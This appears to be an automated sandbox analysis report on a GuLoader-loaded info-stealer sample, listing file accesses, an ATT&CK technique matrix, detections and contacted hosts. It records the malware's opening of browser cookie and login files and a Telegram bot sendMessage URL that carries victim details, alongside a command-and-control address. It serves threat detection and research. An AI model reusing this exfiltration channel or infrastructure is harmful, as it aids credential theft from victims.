          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2700, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2700, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2700, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          2
          Obfuscated Files or Information
          1
          OS Credential Dumping
          3
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Software Packing
          LSASS Memory24
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell
          Logon Script (Windows)311
          Process Injection
          1
          DLL Side-Loading
          Security Account Manager121
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Masquerading
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script41
          Virtualization/Sandbox Evasion
          LSA Secrets41
          Virtualization/Sandbox Evasion
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634851 Sample: bddTkmucZP.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 5 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus detection for dropped file 2->48 54 7 other signatures 2->54 8 bddTkmucZP.exe 1 48 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 30->50 52 Uses the Telegram API (likely for C&C communication) 32->52 process4 dnsIp5 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 14 powershell.exe 30 8->14         started        42 127.0.0.1 unknown unknown 11->42 file6 process7 file8 26 C:\Users\user\AppData\...\bddTkmucZP.exe, PE32 14->26 dropped 28 C:\Users\...\bddTkmucZP.exe:Zone.Identifier, ASCII 14->28 dropped 60 Early bird code injection technique detected 14->60 62 Writes to foreign memory regions 14->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 14->64 66 3 other signatures 14->66 18 msiexec.exe 15 8 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 58309 TELEGRAMRU United Kingdom 18->36 38 checkip.dyndns.com 158.101.44.242, 58292, 58295, 58297 ORACLE-BMC-31898US United States 18->38 40 3 other IPs or domains 18->40 56 Tries to steal Mail credentials (via file / registry access) 18->56 58 Tries to harvest and steal browser information (history, passwords, etc) 18->58 signatures12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          bddTkmucZP.exe74%VirustotalBrowse
          bddTkmucZP.exe53%ReversingLabsWin32.Ransomware.GuLoader
          bddTkmucZP.exe100%AviraTR/Injector.cgeez
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\bddTkmucZP.exe100%AviraTR/Injector.cgeez
          C:\Users\user\AppData\Local\Temp\nsg2A1D.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsg2A1D.tmp\nsExec.dll0%VirustotalBrowse
          C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\bddTkmucZP.exe53%ReversingLabsWin32.Ransomware.GuLoader
          C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\bddTkmucZP.exe74%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          216.58.206.78
          truefalse
            high
            drive.usercontent.google.com
            172.217.23.97
            truefalse
              high
              reallyfreegeoip.org
              104.21.80.1
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  158.101.44.242
                  truefalse
                    high
                    241.42.69.40.in-addr.arpa
                    unknown
                    unknownfalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:08:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://drive.google.com/GSmsiexec.exe, 0000000B.00000002.2116644708.0000000008C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgmsiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botmsiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.microsoftpowershell.exe, 00000001.00000002.1518294671.0000000007B43000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20amsiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.office.com/lBmsiexec.exe, 0000000B.00000002.2131404066.0000000024C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://chrome.google.com/webstore?hl=enmsiexec.exe, 0000000B.00000002.2131404066.0000000024C0E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://varders.kozow.com:8081msiexec.exe, 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/_Smsiexec.exe, 0000000B.00000002.2116644708.0000000008C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.commsiexec.exe, 0000000B.00000003.1688467739.0000000008D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.com/images/branding/product/ico/googleg_alldp.icomsiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1513466927.0000000005471000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contoso.com/powershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://apis.google.commsiexec.exe, 0000000B.00000003.1688467739.0000000008D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.microsoft.cpowershell.exe, 00000001.00000002.1518294671.0000000007B43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1513466927.0000000005471000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
